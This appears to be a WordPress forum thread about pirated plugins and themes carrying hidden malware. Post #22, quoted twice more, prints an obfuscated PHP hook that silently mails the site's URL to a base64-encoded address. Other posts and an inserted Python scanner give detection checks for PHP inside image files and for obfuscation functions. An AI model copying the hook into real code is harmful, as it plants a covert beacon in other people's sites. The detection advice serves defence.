06-24-2014, 03:40 PM
Post: #21
RE:
thanks for the share. great info. rep added.
06-24-2014, 10:38 PM
Post: #22
RE:
VirusTotal is useless. I had ubermenu flat skins plugin installed. VirusTotal results were clean. However, the plugin was infected.

infected plugin has this spam code

addressdecode=base64_decode("amFxcXNjaWdzQGdtYWlsLmNvbQ==")

because that code is same with this code:

addressdecode="jaqqscigs@gmail.com";

find that code then replace this entire code

add_action('wp_head','my_wpfunww439');function my_wpfunww439(){if(!username_exists('wordpress')){$addressdecode=base64_decode("amFxcXNjaWdzQGdtYWlsLmNvbQ==");$vari='Wordpress Plugin';wp_mail($addressdecode,$vari,get_bloginfo('wpurl'));}}

Basically it was sending spam mails from my website. My website got blocked by hosting provider because my website caused their server IP address to be banned.

Lesson learnt but it was too late
06-24-2014, 11:21 PM
Post: #23
RE:
Great post, repped and bookmarking this for reference.
06-24-2014, 11:21 PM
Post: #24
RE:
Virustotal is designed to find Windows exploits.
(06-24-2014 10:38 PM)thelatinodancer Wrote:  VirusTotal is useless. I had ubermenu flat skins plugin installed. VirusTotal results were clean. However, the plugin was infected.

infected plugin has this spam code

addressdecode=base64_decode("amFxcXNjaWdzQGdtYWlsLmNvbQ==")

because that code is same with this code:

addressdecode="jaqqscigs@gmail.com";

find that code then replace this entire code

add_action('wp_head','my_wpfunww439');function my_wpfunww439(){if(!username_exists('wordpress')){$addressdecode=base64_decode("amFxcXNjaWdzQGdtYWlsLmNvbQ==");$vari='Wordpress Plugin';wp_mail($addressdecode,$vari,get_bloginfo('wpurl'));}}

Basically it was sending spam mails from my website. My website got blocked by hosting provider because my website caused their server IP address to be banned.

Lesson learnt but it was too late
06-24-2014, 11:38 PM
Post: #25
RE:
I too was hacked really bad and since then I use Wordfence, which is the best security plugin. I also use VirusTotal on downloaded shares. I use the Exploit Scanner plugin, but it doesn't remove base64, eval function and other malicious code, it only scans, and I've found that code in WP core files, not just in other themes and plugins.

TAC wasn't updated for a while but I see now that they updated it but I use Wordfence. Wordfence was the service that notified me about Heartbleed virus just hours when it was detected and I was able to get the OpenSSL fixed quickly before most people heard about it. :)
06-25-2014, 01:22 AM
Post: #26
RE:
good to know that. thx
06-25-2014, 01:44 AM
Post: #27
RE:
Honestly... you guys say that wplocker is bad?! loool, have you seen the current state of this forum?! Bunch of users reposting themes from other users, bunch of infected links. Really? Every site is bad, wplocker, this one, everyone. One does not take a paid theme for free and expect a working site. Most users don't even know what a PHP file is and they come here and there complaining that this and that is infected. I'm sorry but I'm tired, like most of the good users in here.
06-25-2014, 02:21 AM
Post: #28
RE:
(06-24-2014 10:38 PM)thelatinodancer Wrote:  VirusTotal is useless. I had ubermenu flat skins plugin installed. VirusTotal results were clean. However, the plugin was infected.

infected plugin has this spam code

addressdecode=base64_decode("amFxcXNjaWdzQGdtYWlsLmNvbQ==")

because that code is same with this code:

addressdecode="jaqqscigs@gmail.com";

find that code then replace this entire code

add_action('wp_head','my_wpfunww439');function my_wpfunww439(){if(!username_exists('wordpress')){$addressdecode=base64_decode("amFxcXNjaWdzQGdtYWlsLmNvbQ==");$vari='Wordpress Plugin';wp_mail($addressdecode,$vari,get_bloginfo('wpurl'));}}

Basically it was sending spam mails from my website. My website got blocked by hosting provider because my website caused their server IP address to be banned.

Lesson learnt but it was too late
See post #25. You've got to use Wordfence.
06-25-2014, 02:38 AM
Post: #29
RE:
(06-23-2014 02:32 PM)GreenPeace Wrote:  Thanks for sharing this about wplocker. I am still a victim of the YouTube redirect virus on one of my sites. Did a strip search of the site but nothing. Still redirects the site randomly to a Justin Bieber video!! Man, I don't even like Justin Bieber :-|



Search for
Code:
<?php include 'images/social.png' ?>
You may find that piece of code in functions.php or in index.php.
Search for the image file social.png. Open it with a text editor (like Notepad++). If the file starts with <?php, it means that the theme or plugin is infected.
Search for all strings containing base64_decode, gzinflate, gzuncompress or str_rot13 (or all in the same string). Use the "Find in Files" function of Notepad++ to find all encoded strings.
Go to http://ddecode.com/phpdecoder/ and paste the encoded string. Decode it. If you understand PHP a bit, you will also understand whether the code is safe or malicious. If you have no clue about PHP, send me a message with the ddecode.com link. I will try to help you out.

Maybe I will open a topic to help you all with this issue.
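
The checks from posts #22 and #29 as one script, added here as an example and not code from any poster: it flags image files that begin with <?php, includes of image files, calls to the four functions listed above, and decodes base64 string literals locally so the hidden value can be read on the spot. The names scan_tree and demo, the rule labels and the sample files are assumptions constructed for illustration.

```python
import base64, re, tempfile
from pathlib import Path

IMAGE_EXT = {".png", ".jpg", ".jpeg", ".gif", ".ico"}
# The four functions named in the post; legitimate code calls them too, so review each hit.
OBFUSCATION = re.compile(rb"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(")
# include/require whose target has an image extension, e.g. include 'images/social.png'
IMG_INCLUDE = re.compile(
    rb"\b(?:include|require)(?:_once)?\s*\(?\s*['\"]([^'\"]+\.(?:png|jpe?g|gif|ico))['\"]", re.I)
B64_LITERAL = re.compile(rb"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]")

def scan_tree(root):
    """Return (relative_path, rule, detail) findings for a theme or plugin directory."""
    findings = []
    for path in sorted(p for p in Path(root).rglob("*") if p.is_file()):
        data, rel = path.read_bytes(), path.relative_to(root).as_posix()
        ext = path.suffix.lower()
        if ext in IMAGE_EXT:
            # A real image starts with its magic number, never with a PHP open tag.
            if data.lstrip().startswith(b"<?php"):
                findings.append((rel, "php-in-image", ""))
        elif ext == ".php":
            for m in IMG_INCLUDE.finditer(data):
                findings.append((rel, "image-include", m.group(1).decode()))
            for m in OBFUSCATION.finditer(data):
                findings.append((rel, "obfuscation-call", m.group(1).decode()))
            for m in B64_LITERAL.finditer(data):
                try:  # decode locally so the hidden value is visible in the report
                    text = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
                except ValueError:
                    continue
                findings.append((rel, "base64-literal", text))
    return findings

def demo():
    """Scan a constructed sample plugin (not taken from any real package)."""
    hidden = base64.b64encode(b"collector@example.invalid").decode()
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "images").mkdir()
        (root / "images" / "logo.png").write_bytes(b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)
        (root / "images" / "social.png").write_text("<?php /* constructed placeholder */ ?>")
        (root / "functions.php").write_text(
            f"<?php include 'images/social.png' ?>\n<?php $addr = base64_decode(\"{hidden}\"); ?>\n")
        return scan_tree(root)

if __name__ == "__main__":
    for finding in demo():
        print(finding)
```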
06-25-2014, 02:50 AM (This post was last modified: 06-25-2014 02:51 AM by disi13.)
Post: #30
RE:
Example for plugin infected with "social.png"
getnulledscripts .com in "codecanyon-visual-composer-extensions-ihover-v1-2-wordpress-plugin"